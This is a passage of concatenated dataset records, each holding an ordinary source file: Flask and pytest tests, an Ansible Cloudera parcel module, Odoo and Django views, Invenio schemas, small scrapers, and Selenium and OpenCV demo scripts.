{'previous_questions': [], 'quiz_category': {'type': 'Entertainment', 'id': 1}}\n\n res = self.client().post('/quizzes', json=quizQuestion)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n def test_unsuccessful_quiz_play(self):\n quizQuestion = {'quiz_category': {'type': 'Entertainment', 'id': 1000}}\n res = self.client().post('/quizzes', json=quizQuestion)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data[\"success\"], False)\n self.assertEqual(data[\"message\"], 'Page Not Found')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"18463751","text":"#!/usr/bin/python3\n\nimport time\nfrom natsort import natsorted\nfrom cm_client.rest import ApiException\nimport cm_client\nfrom ansible.module_utils.basic import AnsibleModule\nimport re\nfrom functools import wraps\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.0\",\n \"supported_by\": \"community\",\n \"status\": [\"preview\"],\n \"version\": \"1.1.0\"\n}\n\n\ndef build_module():\n fields = {\n \"cm_login\": {\"required\": True, \"type\": \"str\", \"no_log\": True},\n \"cm_password\": {\"required\": True, \"type\": \"str\", \"no_log\": True},\n \"cm_host\": {\"required\": True, \"type\": \"str\"},\n \"cm_port\": {\"required\": False, \"type\": \"str\", \"default\": \"7180\"},\n \"cluster_name\": {\"required\": True, \"type\": \"str\"},\n 
\"api_version\": {\"required\": False, \"type\": \"str\", \"default\": \"18\"},\n \"product\": {\"required\": False, \"type\": \"str\"},\n \"version\": {\"required\": False, \"type\": \"str\", \"default\": \"latest\"},\n \"state\": {\n \"default\": \"infos\",\n \"choices\": ['present', 'distributed', 'activated', 'absent', 'infos'],\n \"type\": 'str'\n }\n }\n\n mutually_exclusive = []\n module = AnsibleModule(\n argument_spec=fields,\n mutually_exclusive=mutually_exclusive,\n supports_check_mode=True\n )\n\n return module\n\n\nclass Parcel:\n def __init__(self, name, version, cluster_name, api_client, module, no_wait=False, **kwargs):\n self.name = name\n self.module = module\n self.cluster_name = cluster_name\n self.api_client = api_client\n self.parcel_api_client_instance = cm_client.ParcelResourceApi(self.api_client)\n self.parcels_api_client_instance = cm_client.ParcelsResourceApi(self.api_client)\n # Getting cluster version to guess a \"latest\" parcel\n self.api_instance = cm_client.ClouderaManagerResourceApi(self.api_client)\n self.cluster_version = self._get_cluster_version()\n self.version = self._get_versions(version)\n self.no_wait = no_wait\n self.changed = False\n self._update()\n\n # Try-except decorator to log errors on the cluster management API requests.\n class Decorators(object):\n @classmethod\n def try_cm_api(cls, func, *args):\n @wraps(func)\n def wrapper(*args):\n try:\n return func(*args)\n except ApiException as e:\n args[0].module.fail_json(msg=f\"Cluster Manager error : {e}\")\n return wrapper\n\n def _update(self):\n self.stage = self._get_stage()\n self.status = self._get_status()\n\n @Decorators.try_cm_api\n def _get_status(self):\n return self.parcel_api_client_instance.read_parcel(self.cluster_name, self.name, self.version).state\n\n @Decorators.try_cm_api\n def _get_stage(self):\n return self.parcel_api_client_instance.read_parcel(self.cluster_name, self.name, self.version).stage.lower()\n\n @Decorators.try_cm_api\n def _get_cluster_version(self):\n return self.api_instance.get_version().version\n\n @Decorators.try_cm_api\n def _get_parcels_list(self):\n return self.parcels_api_client_instance.read_parcels(self.cluster_name).items\n\n def _get_versions(self, version):\n if version == \"latest\":\n versions = []\n for parcel in self._get_parcels_list():\n guess = re.compile(f'^.*cdh{self.cluster_version[0]}$') # i.e. \"^.*cdh6$\"\n if (parcel.product == self.name):\n # Kinda guessing the version of Fusion Client. 
I have doubts about it.\n if guess.match(parcel.version.lower()) or (\"cdh\" not in parcel.version):\n versions.append(parcel.version)\n if len(versions) > 0:\n version = natsorted(versions)[-1]\n return version\n\n def _check_transition(self):\n self._update()\n if self.no_wait:\n return True\n trans_states = [\"downloading\", \"distributing\", \"undistributing\", \"activating\"]\n while ((self.status.total_count > 0) and (self.status.total_count != self.status.count) or (self.stage in trans_states)):\n time.sleep(1)\n self._update()\n\n @Decorators.try_cm_api\n def _download(self):\n self.parcel_api_client_instance.start_download_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _distribute(self):\n self.parcel_api_client_instance.start_distribution_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _activate(self):\n self.parcel_api_client_instance.activate_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _deactivate(self):\n self.parcel_api_client_instance.deactivate_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _remove_distribution(self):\n self.parcel_api_client_instance.start_removal_of_distribution_command(self.cluster_name, self.name, self.version)\n\n @Decorators.try_cm_api\n def _remove_downloaded(self):\n self.parcel_api_client_instance.remove_download_command(self.cluster_name, self.name, self.version)\n\n def downloaded(self):\n if self.stage != \"downloaded\":\n if self.stage == \"activated\":\n self.deactivate()\n if self.stage == \"distributed\":\n self.undistribute()\n self._download()\n self._check_transition()\n self.changed = True\n\n def distributed(self):\n if self.stage != \"distributed\":\n if self.stage != \"downloaded\":\n if self.stage == \"available_remotely\":\n self.downloaded()\n elif self.stage == \"activated\":\n self.deactivate()\n self._distribute()\n self._check_transition()\n self.changed = True\n\n def activated(self):\n if self.stage != \"activated\":\n if self.stage != \"distributed\":\n self.distributed()\n self._activate()\n self._check_transition()\n self.changed = True\n\n def deactivate(self):\n self._deactivate()\n self._check_transition()\n\n def undistribute(self):\n self._remove_distribution()\n self._check_transition()\n\n def available_remotely(self):\n if self.stage != \"available_remotely\":\n if self.stage != \"downloaded\":\n if self.stage == \"activated\":\n self.deactivate()\n if self.stage == \"distributed\":\n self.undistribute()\n self._remove_downloaded()\n self._check_transition()\n self.changed = True\n\n def meta(self):\n meta = {\n \"product\": self.name,\n \"version\": self.version,\n \"stage\": self.stage\n }\n return meta\n\n def __repr__(self):\n return f'Parcel(name=\"{self.name}\", version=\"{self.version}\", cluster_name=\"{self.cluster_name}\", api_client={self.api_client},\\\n stage=\"{self.stage}\", status={self.status})'\n\n def __str__(self):\n return f\"name: {self.name}, version: {self.version}, state: {self.stage}\"\n\n\ndef main():\n module = build_module()\n choice_map = {\n 'present': 'downloaded',\n 'distributed': 'distributed',\n 'activated': 'activated',\n 'absent': 'available_remotely'\n }\n params = module.params\n\n api_url = f\"http://{params['cm_host']}:{params['cm_port']}/api/v{params['api_version']}\"\n cm_client.configuration.username = params['cm_login']\n cm_client.configuration.password = params['cm_password']\n cm_client.configuration.host = api_url\n 
api_client = cm_client.ApiClient()\n\n # Getting info at first. Info can be without any product and version, just about all available parcels.\n if params[\"state\"] == \"infos\":\n api_client_instance = cm_client.ParcelsResourceApi(api_client)\n try:\n parcels = []\n for parcel in api_client_instance.read_parcels(params[\"cluster_name\"]).items:\n if params[\"product\"] is not None:\n # Info about a specific product?\n if params[\"product\"] != parcel.product:\n continue\n # Info about a specific version? \"Latest\" will not work here.\n # TODO: Regex and \"latest\" detection\n supposed_parcel = Parcel(params[\"product\"], params[\"version\"], params[\"cluster_name\"], api_client, module)\n if supposed_parcel.version != parcel.version:\n continue\n parcels.append(\n Parcel(\n name=parcel.product,\n version=parcel.version,\n cluster_name=parcel.cluster_ref.cluster_name,\n api_client=api_client,\n module=module\n ).meta()\n )\n module.exit_json(changed=False, msg=\"Parcels informations gathered\", meta=parcels)\n except ApiException as e:\n module.fail_json(msg=f\"Cluster error : {e}\")\n else:\n if params[\"product\"] is not None:\n parcel = Parcel(params[\"product\"], params[\"version\"], params[\"cluster_name\"], api_client, module)\n try:\n getattr(parcel, choice_map.get(params[\"state\"]))()\n except ApiException as e:\n module.fail_json(msg=f\"Cluster error : {e}\")\n module.exit_json(changed=parcel.changed, msg=f\"{parcel.name} is {parcel.stage}\", meta=parcel.meta())\n else:\n module.fail_json(changed=False,\n msg=\"No valid parameters combination was used: \\\"product\\\" is not set, exiting\", meta=[])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cloudera_parcel_manager.py","file_name":"cloudera_parcel_manager.py","file_ext":"py","file_size_in_byte":9905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358315594","text":"import datetime\nimport uuid\nfrom urllib.parse import urlparse\n\nimport math\nfrom flask import current_app\nfrom marshmallow import Schema\nfrom marshmallow import ValidationError, fields, post_load, validates, validates_schema\nfrom marshmallow import validate\nfrom marshmallow.validate import Range\nfrom werkzeug.exceptions import HTTPException\n\nfrom sword3common.constants import JSON_LD_CONTEXT, PackagingFormat\n\n__all__ = [\"ByReferenceSchema\"]\n\n\nclass ByReferenceFileDefinition:\n def __init__(\n self,\n *,\n url: str = None,\n temporary_id: uuid.UUID = None,\n content_disposition: str,\n content_type: str,\n content_length: int = None,\n dereference: bool,\n packaging: str,\n ttl: datetime.datetime = None\n ):\n assert url or temporary_id\n self.url = url\n self.temporary_id = temporary_id\n self.content_disposition = content_disposition\n self.content_type = content_type\n self.content_length = content_length\n self.dereference = dereference\n self.packaging = packaging\n self.ttl = ttl\n\n\nclass _ByReferenceFileSchema(Schema):\n url = fields.Url(data_key=\"@id\", required=True)\n content_disposition = fields.String(data_key=\"contentDisposition\", required=True)\n content_length = fields.Integer(data_key=\"contentLength\", strict=True)\n content_type = fields.String(data_key=\"contentType\", required=True)\n dereference = fields.Boolean(required=True)\n packaging = fields.String(missing=PackagingFormat.Binary)\n ttl = fields.AwareDateTime()\n\n @validates_schema\n def validate_url(self, data, **kwargs):\n parsed_url = urlparse(data[\"url\"])\n if parsed_url.hostname == 
self.context[\"url_adapter\"].server_name:\n try:\n rule, rv = self.context[\"url_adapter\"].match(parsed_url.path)\n except HTTPException:\n return None\n if rule == \"invenio_sword.temporary_url\":\n data[\"temporary_id\"] = rv[\"temporary_id\"]\n del data[\"url\"]\n\n @post_load\n def make_object(self, data, **kwargs):\n return ByReferenceFileDefinition(**data)\n\n\nclass ByReferenceSchema(Schema):\n jsonld_context = fields.String(\n data_key=\"@context\",\n validate=[validate.OneOf([JSON_LD_CONTEXT])],\n required=True,\n )\n jsonld_type = fields.String(\n data_key=\"@type\", validate=[validate.OneOf([\"ByReference\"])], required=True,\n )\n files = fields.List(\n fields.Nested(_ByReferenceFileSchema),\n data_key=\"byReferenceFiles\",\n required=True,\n )\n\n\nclass SegmentInitSchema(Schema):\n \"\"\"For validating parameters on `Content-Disposition: segment-init` headers\"\"\"\n\n # validate parameters are lambdas to defer accessing current_app until we're inside the application context\n\n size = fields.Integer(\n required=True,\n validate=lambda value: Range(\n current_app.config[\"FILES_REST_MULTIPART_MAX_PARTS\"]\n ),\n )\n segment_count = fields.Integer(\n required=True,\n validate=lambda value: Range(\n 1, current_app.config[\"FILES_REST_MULTIPART_MAX_PARTS\"]\n ),\n )\n segment_size = fields.Integer(\n required=True,\n validate=lambda value: Range(\n current_app.config[\"FILES_REST_MULTIPART_CHUNKSIZE_MIN\"],\n current_app.config[\"FILES_REST_MULTIPART_CHUNKSIZE_MAX\"],\n )(value),\n )\n\n @validates_schema\n def validate_segment_count(self, data, **kwargs):\n if data[\"segment_count\"] != math.ceil(data[\"size\"] / data[\"segment_size\"]):\n raise ValidationError(\n {\n \"segment_count\": \"Wrong number of segments for given size and segment_size.\"\n }\n )\n\n\nclass SegmentUploadSchema(Schema):\n segment_number = fields.Integer(required=True)\n\n def __init__(self, *args, segment_count, **kwargs):\n self._segment_count = segment_count\n super().__init__(*args, **kwargs)\n\n @validates(\"segment_number\")\n def validate_segment_number(self, value):\n return Range(1, self._segment_count)(value)\n","sub_path":"invenio_sword/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325625295","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import http\nfrom odoo.http import request, route\nimport json\nimport time\nimport logging\n\nclass Webhooks(http.Controller):\n @route('/webhooks', type='json', auth=\"public\")\n def index(self, **kw):\n\n args = json.loads(request.httprequest.data)\n producer = 'stores/' + request.env[\"res.config.settings\"].sudo().obtener_store_hash()\n if args and args['producer'] and args['producer'] == producer and args['scope'] and args['data'] and args['data']['id']:\n #Customers\n if args['scope'] == 'store/customer/created':\n logging.warn('Webhook - Customers - created')\n params = [{'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner'].sudo().transferir_bc_odoo(params)\n elif args['scope'] == 'store/customer/updated':\n time.sleep(3)\n logging.warn('Webhook - Customers - updated')\n params = [{'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner'].sudo().transferir_bc_odoo(params)\n #Address\n elif args['scope'] == 'store/customer/address/created':\n logging.warn('Webhook - Address - created')\n params = [{'customer_id:in': args['data']['address']['customer_id']}, {'id:in': 
args['data']['id']}]\n                request.env['sinc_bigcommerce.res_partner_address'].sudo().transferir_bc_odoo(params)\n            elif args['scope'] == 'store/customer/address/updated':\n                time.sleep(3)\n                logging.warn('Webhook - Address - updated')\n                params = [{'customer_id:in': args['data']['address']['customer_id']}, {'id:in': args['data']['id']}]\n                request.env['sinc_bigcommerce.res_partner_address'].sudo().transferir_bc_odoo(params)\n            #Orders\n            elif args['scope'] == 'store/order/statusUpdated' and args['data']['status'] and args['data']['status']['previous_status_id'] == 11 and args['data']['status']['new_status_id'] == 9:\n                logging.warn('Webhook - Orders')\n                params = [{'order_id': args['data']['id']}]\n                request.env['sinc_bigcommerce.sale'].sudo().transferir_bc_odoo(params)\n","sub_path":"controllers/webhooks.py","file_name":"webhooks.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"256526084","text":"import http.client\nimport json\nimport time\nimport sys\nimport collections\nimport random\n\n# Can get info of 200 routes per call\napi_key = '' # USE YOUR OWN API KEY\nstart_index = 0\ncounter = 0\n# NOTE: all_routes (the full list of route IDs) is assumed to be defined earlier in the script;\n# the upper bound is extended by one batch so the final partial batch of routes is not skipped\nfor end_index in range(200, len(all_routes) + 200, 200):\n    print(start_index)\n\n    # Collect 200 routes\n    bolus_of_routes = all_routes[start_index:end_index]\n\n    # Convert all elements to dtype string\n    bolus_of_routes = [str(i) for i in bolus_of_routes]\n\n    # takes list and concatenates elements with , as separator\n    string_of_routes = \",\".join(bolus_of_routes)\n\n    # Setup connection\n    conn = http.client.HTTPSConnection(\"www.mountainproject.com\", timeout=180)\n    payload = \"{}\"\n\n    # Make request\n    conn.request(\"GET\", \"/data/get-routes?routeIds=\" + string_of_routes + \"&key=\" + api_key, payload)\n\n    # Get response\n    res = conn.getresponse()\n\n    # Collect data\n    data = res.read()\n\n    # Unpackage json object and extract relevant info\n    inventory = json.loads(data)\n    route_info = inventory['routes']\n\n    # Write array to file\n    with open(\"route_data/routes_\" + str(counter) + '.json', 'w') as outfile:\n        json.dump(route_info, outfile)\n\n    # Used for next iteration\n    start_index = end_index\n    counter += 1\n\n    # OPTIONAL: Sleep randomly, just a precaution for too many API calls\n    time.sleep(random.randint(1, 30))\n","sub_path":"getScripts/getRoutes.py","file_name":"getRoutes.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"123581265","text":"import pickle\nimport jieba\n\n\n\nCasePath = './raw_data/case.bin'\nLawPath = './raw_data/divorce_full.txt'\n\n\nclass Result(object):\n    def __init__(self, result):\n        self.plea = result[0]\n        self.raw_result = result[1]\n        self.result = result[2] # binary\n        self.extracted_law = result[3]\n\n\nclass DataInstance(object):\n    def __init__(self, instance):\n        self.fact = instance[0][0]\n        self.pleas = instance[0][1]\n        self.law = instance[0][2]\n        self.raw_result = instance[3]\n        self.result = [Result(Plea) for Plea in instance[4]]\n\n\nclass Reader(object):\n    def __init__(self):\n        self.law = {'divorce': [],\n                    'child': [],\n                    'maintenance': []}\n        self.cases = []\n        self._load()\n\n    def _load(self):\n        print(\"Start to load law text.\")\n        with open(LawPath, \"r\")as f:\n            laws = f.readlines()\n        laws = list(map(lambda x: list(\n            filter(lambda x: len(x) > 0, list(jieba.cut(x.strip().replace(' ', ''), cut_all=False)))\n        ), laws))\n        print(\"law articles loaded.\")\n        
self.law['divorce'].extend(laws[:26])\n self.law['child'].extend(laws[26:38])\n self.law['maintenance'].extend(laws[38:])\n\n with open(CasePath, \"rb\")as f:\n raw_data = pickle.load(f)\n self.cases.extend([DataInstance(instance) for instance in raw_data])\n print(\"cases loaded.\")\n","sub_path":"tools/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291690555","text":"\"\"\"\r\nDemo of working with Checkboxes using Selenium Webdriver\r\n\"\"\"\r\n\r\nfrom selenium import webdriver\r\n\r\n\r\ndriver = webdriver.Chrome()\r\n\r\n#save the url to navigate to\r\nurl = 'http://localhost/checkbox-radio.html'\r\n\r\n#Navigate to the url\r\ndriver.get(url)\r\n\r\ndef assert_element_is_checkbox(element):\r\n \"\"\"\r\n Function to check a passed in element is a html checkbox element.\r\n Raises an assertion exception if the element is not a checkbox.\r\n :param element: the element object to be checked\r\n \"\"\"\r\n\r\n my_element_type = element.get_attribute('type') #getting the type attribute..normally associated with an input\r\n\r\n if my_element_type != 'checkbox': #checking if its a checkbox\r\n raise AssertionError('The passed is not a checkbox')\r\n\r\n return\r\n\r\ndef is_checkbox_selected(element):\r\n \"\"\"\r\n Function to check if a checkbox is checked or not.\r\n It will return 'True' if checked or 'False' if not checked.\r\n :param element:\r\n :return: boolean\r\n \"\"\"\r\n\r\n assert_element_is_checkbox(element)\r\n\r\n if element.is_selected(): #is checkbox selected\r\n return True\r\n else:\r\n return False\r\n\r\ndef assert_checkbox_is_selected(element):\r\n \"\"\"\r\n Function to assert if a check box is select.\r\n Will raise an assertion exception if the passed in element is not a check box or it is not checked.\r\n :param element:\r\n :return:\r\n \"\"\"\r\n assert_element_is_checkbox(element)\r\n\r\n if not is_checkbox_selected(element):\r\n raise AssertionError('The element is not selected.')\r\n\r\n return\r\n\r\ndef assert_checkbox_is_enabled(element):\r\n \"\"\"\r\n Function to verify if the passed in element is enabled. 
Enabled element is clickable/selectable.\r\n Raises an assertion exception if the element is not checkbox or is not enabled.\r\n :param element:\r\n :return:\r\n \"\"\"\r\n assert_element_is_checkbox(element)\r\n\r\n if not element.is_enabled(): #checking if its enabled or not\r\n raise AssertionError('The checkbox is not enabled.')\r\n\r\n\r\n# Start of function calls\r\n\r\njava_box = driver.find_element_by_name('java')\r\n\r\nprint(is_checkbox_selected(java_box))\r\nassert_checkbox_is_enabled(java_box)\r\n\r\nphp_box = driver.find_element_by_name('php')\r\nprint(php_box.is_enabled())\r\n","sub_path":"src/checkboxr.py","file_name":"checkboxr.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453772786","text":"\nimport cv2\nimport sys\nimport numpy\n\ndef main(argv):\n\n img = cv2.imread(\"input\\\\Image1.jpg\",cv2.IMREAD_GRAYSCALE)\n\n\n # kernel = numpy.ones((3,3),numpy.uint8)\n # cv2.filter2D(img,-1,kernel,img)\n\n # th = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n # cv2.THRESH_BINARY,13,2)\n\n blur = cv2.GaussianBlur(img,(3,3),0)\n ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_OTSU)\n\n\n\n #erosion = cv2.erode(img,kernel,iterations = 1)\n #dilation = cv2.dilate(erosion,kernel,iterations = 1)\n\n cv2.imwrite(\"output\\\\image.jpg\",th3)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"[3]OpenCV - limpezire text/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"33123302","text":"import json\nimport logging\nimport os\nimport time\nimport traceback\nfrom datetime import datetime, timedelta\n\nimport itchat\nimport pytz\nimport requests\nfrom fake_useragent import UserAgent\n\nUSE_ITCHAT = False\nWECHAT_GROUP_NAME = '豆瓣开车小组'\n\nFILE_NAME_DETECTED_IDS = 'detected_ids.txt'\nFILE_NAME_SERVER_CHAN_KEY = 'sckey.key'\n\nSLEEP_TIME_NORMAL = 6\nSLEEP_TIME_WHEN_EXCEPTION = 60\n\n\ndef get_logger():\n logger = logging.getLogger(__name__)\n\n formatter = logging.Formatter(\"%(asctime)s: %(filename)s [line:%(lineno)d]: [%(levelname)s]: %(message)s\")\n\n handler1 = logging.StreamHandler()\n handler2 = logging.FileHandler(filename=\"main.log\")\n\n handler1.setLevel(logging.DEBUG)\n handler2.setLevel(logging.DEBUG)\n\n handler1.setFormatter(formatter)\n handler2.setFormatter(formatter)\n\n logger.addHandler(handler1)\n logger.addHandler(handler2)\n\n return logger\n\n\ndef send_msg(title, msg):\n def _send_msg_by_itchat():\n room = itchat.search_chatrooms(WECHAT_GROUP_NAME)[0]\n room.send(msg)\n\n def _send_msg_by_server_chan():\n with open(FILE_NAME_SERVER_CHAN_KEY) as f:\n sckey = f.read().strip()\n url = f'http://sc.ftqq.com/{sckey}.send'\n params = {\n 'text': title,\n 'desp': msg,\n }\n requests.get(url, params=params)\n\n if USE_ITCHAT:\n _send_msg_by_itchat()\n else:\n _send_msg_by_server_chan()\n\n\ndef is_time_ok(dt):\n if datetime.now(pytz.timezone('Asia/Shanghai')).replace(tzinfo=None) - datetime.strptime(dt, '%Y-%m-%d %H:%M:%S') < timedelta(seconds=24 * 3600):\n return True\n\n\ndef get_detected_ids():\n if os.path.exists(FILE_NAME_DETECTED_IDS):\n with open(FILE_NAME_DETECTED_IDS) as f:\n return json.load(f)\n return []\n\n\ndef set_detected_ids(ids):\n with open(FILE_NAME_DETECTED_IDS, 'w+') as f:\n json.dump(ids, f)\n\n\ndef main():\n logger = get_logger()\n\n if USE_ITCHAT:\n itchat.auto_login(hotReload=True)\n\n detected_ids 
= get_detected_ids()\n    url = 'https://api.douban.com/v2/group/656297/topics?start=0&count=100'\n\n    while True:\n        time.sleep(SLEEP_TIME_NORMAL)\n\n        try:\n            headers = {'User-Agent': UserAgent().random}\n            resp = requests.get(url, headers=headers)\n            if resp.status_code != 200:\n                logger.error(f'Got status_code: {resp.status_code}')\n                logger.error(f'resp.content: {resp.content}')\n                continue\n\n            if 'json' not in resp.headers['Content-Type']:\n                logger.error(f'Got Content-Type: {resp.headers[\"Content-Type\"]}')\n                logger.error(f'resp.content: {resp.content}')\n                continue\n\n            resp = resp.json()\n            if 'topics' not in resp:\n                logger.error(f'No topics in resp: {resp}')\n                logger.error(f'json data: {resp}')\n                continue\n\n            for i in resp['topics']:\n                id_ = i['id']\n                title = i['title']\n                # use a distinct name so the API url defined above is not clobbered\n                topic_url = i['alt']\n                create_date = i['created']\n                if '【开车】' in title and is_time_ok(create_date) and id_ not in detected_ids:\n                    msg = f'{title}\\n' \\\n                          f'{topic_url}\\n' \\\n                          f'发布时间:{create_date}'\n                    logger.info(msg.replace('\\n', '\\t'))\n                    send_msg(title, msg)\n                    detected_ids.append(id_)\n                    set_detected_ids(detected_ids)\n        except Exception:\n            logger.error(traceback.format_exc())\n            continue\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"105490971","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone\nfrom .models import Message\nimport logging\n\n# Create your views here.\n\n\ndef ask(request, uid, channel, platform, hostname, version):\n    t = 'message/ask_sg.html'\n    d = {\n        'uid': int(uid),\n        'channel': channel,\n        'platform': platform,\n        'hostname': hostname,\n        'version': version,\n    }\n    d['error_message'] = int(request.GET.get('error_message', 0))\n    if request.method == 'POST':\n        if request.POST.get('content') and len(request.POST.get('content')) < 200:\n            m = Message(\n                title=request.POST.get('title'),\n                content=request.POST.get('content'),\n                channel=channel,\n                platform=platform,\n                hostname=hostname,\n                uid=uid,\n                pub_date=timezone.now()\n            )\n            try:\n                m.save()\n                logger = logging.getLogger(__name__)\n                l = \"%(uid)s|%(channel)s|%(platform)s|%(hostname)s|%(version)s\" % d\n                cen = m.content.replace('\\r\\n', '\\\\n')\n                cen = cen.replace('\"', '')\n                cen = cen.replace(\"'\", '')\n                l = l + \"|\" + m.title + \"|\" + cen\n                logger.info(l)\n                d['error_message'] = 3\n            except Exception:\n                d['error_message'] = 2\n        elif request.POST.get('content'):  # content present but too long; avoids len(None) when it is missing\n            d['error_message'] = 4\n        else:\n            d['error_message'] = 1\n        url = reverse('message:ask', args=(\n            uid,\n            channel,\n            platform,\n            hostname,\n            version))\n        url = url + '?error_message=' + str(d['error_message'])\n        return HttpResponseRedirect(url)\n    return render(request, t, d)\n","sub_path":"message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644467040","text":"import pytest\n\nfrom ex4.best_price import best_price\n\n\n@pytest.mark.parametrize(\"a1, a2, a3, b1, b2, b3, expected_price\", [\n    (1, 2, 3, 3, 2, 1, 14)\n])\ndef test_best_price(a1: int, a2: int, a3: int, b1: int, b2: int, b3: int, expected_price: int):\n    price = best_price(a1, a2, a3, b1, b2, b3)\n    assert price == 
expected_price\n","sub_path":"ex4/best_price_test.py","file_name":"best_price_test.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247558932","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nfrom khh.py27.communication.network.util.NetWorkUtil import *\r\n\r\n\r\nimport MySQLdb\r\n\r\n# Open database connection\r\ndb = MySQLdb.connect(\"localhost\",\"root\",\"javadev\",\"search\" )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n\r\n\r\n\r\n\r\n\r\nsite_list =[\r\n [\"A001\" ,\"KB국민은행\"],\r\n [\"A002\" ,\"우리은행\"],\r\n [\"A003\" ,\"신한은행\"],\r\n [\"A004\" ,\"하나은행\"],\r\n [\"A005\" ,\"스탠다드차타드은행\"],\r\n [\"A006\" ,\"한국씨티은행\"],\r\n [\"A007\" ,\"외환은행\"],\r\n [\"A008\" ,\"대구은행\"],\r\n [\"A009\" ,\"부산은행\"],\r\n [\"A010\" ,\"광주은행\"],\r\n [\"A011\" ,\"경남은행\"],\r\n [\"A012\" ,\"전북은행\"],\r\n [\"A013\" ,\"제주은행\"],\r\n [\"A014\" ,\"농협\"],\r\n [\"A015\" ,\"수협\"],\r\n [\"A016\" ,\"한국산업은행\"],\r\n [\"A017\" ,\"기업은행\"],\r\n [\"A018\" ,\"신협\"],\r\n [\"A019\" ,\"우체국\"],\r\n [\"A020\" ,\"새마을금고\"],\r\n [\"C001\" ,\"신한카드\"],\r\n [\"C002\" ,\"광주카드\"],\r\n [\"C003\" ,\"롯데카드\"],\r\n [\"C004\" ,\"삼성카드\"],\r\n [\"C005\" ,\"씨티카드\"],\r\n [\"C006\" ,\"전북카드\"],\r\n [\"C007\" ,\"하나카드\"],\r\n [\"C008\" ,\"현대카드\"],\r\n [\"C009\" ,\"BC카드\"],\r\n [\"C010\" ,\"KB카드\"],\r\n [\"C011\" ,\"NH카드\"],\r\n [\"E001\" ,\"홈택스(국세청)\"],\r\n [\"E002\" ,\"케이노트\"],\r\n [\"E003\" ,\"센드빌\"],\r\n [\"E004\" ,\"스마트빌\"],\r\n [\"E005\" ,\"트러스빌\"],\r\n [\"E006\" ,\"세무로\"],\r\n [\"E007\" ,\"WebTax21\"],\r\n [\"E008\" ,\"Billmate\"],\r\n [\"E009\" ,\"다큐빌\"],\r\n [\"E010\" ,\"TaxBill365\"],\r\n [\"E011\" ,\"Bill36524\"],\r\n [\"E012\" ,\"유노트\"],\r\n [\"E013\" ,\"서울외국환중개\"],\r\n [\"E014\" ,\"외환은행 환율\"],\r\n [\"E015\" ,\"한국은행경제통계시스템\"],\r\n [\"E016\" ,\"KOFIA BIS 경제지표\"],\r\n [\"E017\" ,\"여신금융협회 장부관리\"],\r\n [\"E018\" ,\"하이웍스빌 장부관리(전자세금계산서발행)\"],\r\n [\"E019\" ,\"세틀뱅크 가상계좌\"],\r\n [\"E020\" ,\"한국증권금융\"],\r\n [\"E021\" ,\"HSBC Direct\"],\r\n [\"E022\" ,\"신한금융투자\"],\r\n [\"E023\" ,\"신영증권\"],\r\n [\"E024\" ,\"우리투자증권\"],\r\n [\"E025\" ,\"유안타증권\"],\r\n [\"F001\" ,\"핑거\"],\r\n [\"F002\" ,\"인사이드뱅크 업데이트더존 업데이트 서버\"],\r\n [\"F003\" ,\"인사이드뱅크 더존 공지사항 서버\"],\r\n [\"S001\" ,\"nprotect\"],\r\n [\"S002\" ,\"안랩\"],\r\n [\"S003\" ,\"소프트캠프\"],\r\n [\"S004\" ,\"라온시큐어\"],\r\n [\"S005\" ,\"initech\"],\r\n [\"S006\" ,\"nsmartad\"],\r\n [\"S007\" ,\"nsmartad\"],\r\n [\"S008\" ,\"verisign\"],\r\n [\"S009\" ,\"cyveillance\"],\r\n [\"S010\" ,\"symcd\"],\r\n [\"S011\" 